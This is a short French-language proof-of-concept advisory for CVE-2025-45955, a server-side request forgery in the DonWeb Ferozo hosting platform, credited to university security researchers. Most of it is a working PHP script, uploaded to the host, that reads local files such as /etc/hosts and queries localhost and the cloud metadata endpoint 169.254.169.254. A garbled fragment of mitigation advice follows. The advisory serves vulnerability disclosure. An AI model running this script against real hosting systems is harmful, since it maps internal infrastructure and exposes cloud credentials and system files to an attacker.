
Exploit de preuve de concept pour CVE-2025-45955 démontrant une Falsification de requête côté serveur (SSRF) dans la plateforme d'hébergement DonWeb Ferozo, permettant la cartographie de l'infrastructure interne et l'énumération des métadonnées cloud.
Un attaquant peut exploiter cette vulnérabilité en téléchargeant et en exécutant un fichier PHP spécialement conçu sur la plateforme d'hébergement Ferozo. Lorsqu'il est accédé, le fichier lance une série de tentatives SSRF ciblant des services internes (tels que 127.0.0.1, 169.254.169.254, ou des points de terminaison de maillage de services), des fichiers locaux (par exemple file:///etc/passwd), et des points de terminaison connus de métadonnées cloud. Le script collecte les réponses ou les messages d'erreur, permettant à l'attaquant de cartographier l'infrastructure interne, d'énumérer les services accessibles et de rassembler des informations sensibles pour une exploitation ultérieure.
Le code suivant démontre la vulnérabilité :
<?php
$targets = [
"file:///etc/hosts",
"file:///etc/resolv.conf",
"http://127.0.0.1/",
"http://169.254.169.254/latest/meta-data/"
];
foreach ($targets as $url) {
echo "[*] Trying: $url\n";
$res = @file_get_contents($url);
echo $res ? substr($res, 0, 500) : "Request failed or unreadable.\n";
}
?>
file_get_contents, fopen, etc.)127.0.0.0/8, 169.254.169.254, etc.) via les règles de pare-feu sortantCVE-2025-45955
Signalé par [Facundo Fernandez, Jinook Kim, Surendra Puppala / Security Researchers | @BYU]